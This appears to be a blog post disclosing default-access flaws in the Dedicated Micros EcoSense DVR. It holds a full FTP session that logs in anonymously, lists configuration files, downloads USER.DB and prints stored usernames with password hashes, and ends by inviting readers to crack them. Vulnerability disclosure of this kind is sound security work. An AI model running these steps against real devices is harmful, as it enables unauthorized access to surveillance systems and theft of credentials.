Dedicated Micros EcoSense Digital Video Recorder – Multiple Vulnerabilities

The Dedicated Micros EcoSense Digital Video Recorder (DVR) is a “multi-channel recording with simultaneous playback and viewing. The EcoSense can be accessed and controlled from the state-of-the-art, touch sensitive front panel or via a mouse or keyboard, giving the user full access to all the DVR’s features including PTZ control, Alarm and Event Management and Activity Detection.”

I found a manual online but it requires authentication now for some reason and ‘anonymous’ isn’t working. From the manual:

IMPORTANT: By default, no Usernames and Passwords are required to access any of the various menus

By default on the EcoSense the FTP server is enabled and allows anonymous logins. It also gives you quite a bit of access!

df ~/ecosense$ ftp 192.168.3.40
Connected to 192.168.3.40.
220 ADH FTP SERVER READY TYPE HELP FOR HELP
Name (192.168.3.40:df): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is ADH.
ftp> cd ETC
250 Requested file action okay, completed.
ftp> dir
227 Entering Passive Mode (91,84,157,153,5,144)
150 File status okay; about to open data connection.
d——— 1 root root 0 Oct 12 2009 .
———- 1 root root 1182 Sep 29 2009 DAEMONS.INI
———- 1 root root 673 Sep 29 2009 IDBASE.INI
———- 1 root root 421 Sep 29 2009 PATHS.INI
———- 1 root root 4811 Sep 29 2009 SMBCONF.INI
———- 1 root root 74 Sep 29 2009 urlprofiles.example.ini
———- 1 root root 528 Sep 29 2009 USERS.INI
———- 1 root root 1046 Sep 29 2009 WEBUSER.INI
d——— 1 root root 0 Oct 12 2009 TZ
———- 1 root root 16384 Dec 31 1969 USER.DB
226 Closing data connection. Transfer succeeded
ftp> get USER.DB
local: USER.DB remote: USER.DB
227 Entering Passive Mode (192,168,3,40,5,146)
150 File status okay; about to open data connection.
100% |*****************************************************************| 16384 23.98 KB/s 00:00 ETA
226 Closing data connection. Transfer succeeded
16384 bytes received in 00:00 (23.97 KB/s)
ftp> bye
221 Service closing control connection. Bye…
df ~/ecosense$ file USER.DB
USER.DB: ASCII text
df ~/ecosense$ strings USER.DB
Menu Configuration control 3a27621475bd00fec8ca6b74d5ef2763 none 0|0 0|0
Remote Users warehouse 7d9657f56a611dbff1cbf00c8428eadd none 0|ff 0|ff
Remote Users control 4f465a3ba5a652583a2b89635496f64d none 0|ff 0|ff
df ~/ecosense$

According to CrackStation that hash isn’t LM, NTLM, md2, md4, md5, md5(md5), md5-half, sha1, sha1(sha1_bin()), sha224, sha256, sha384, sha512, ripeMD160, whirlpool, or MySQL 4.1+. I don’t know enough about figuring out crypto to proceed. Hopefully someone else can figure it out!

Advertisements

Tags:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: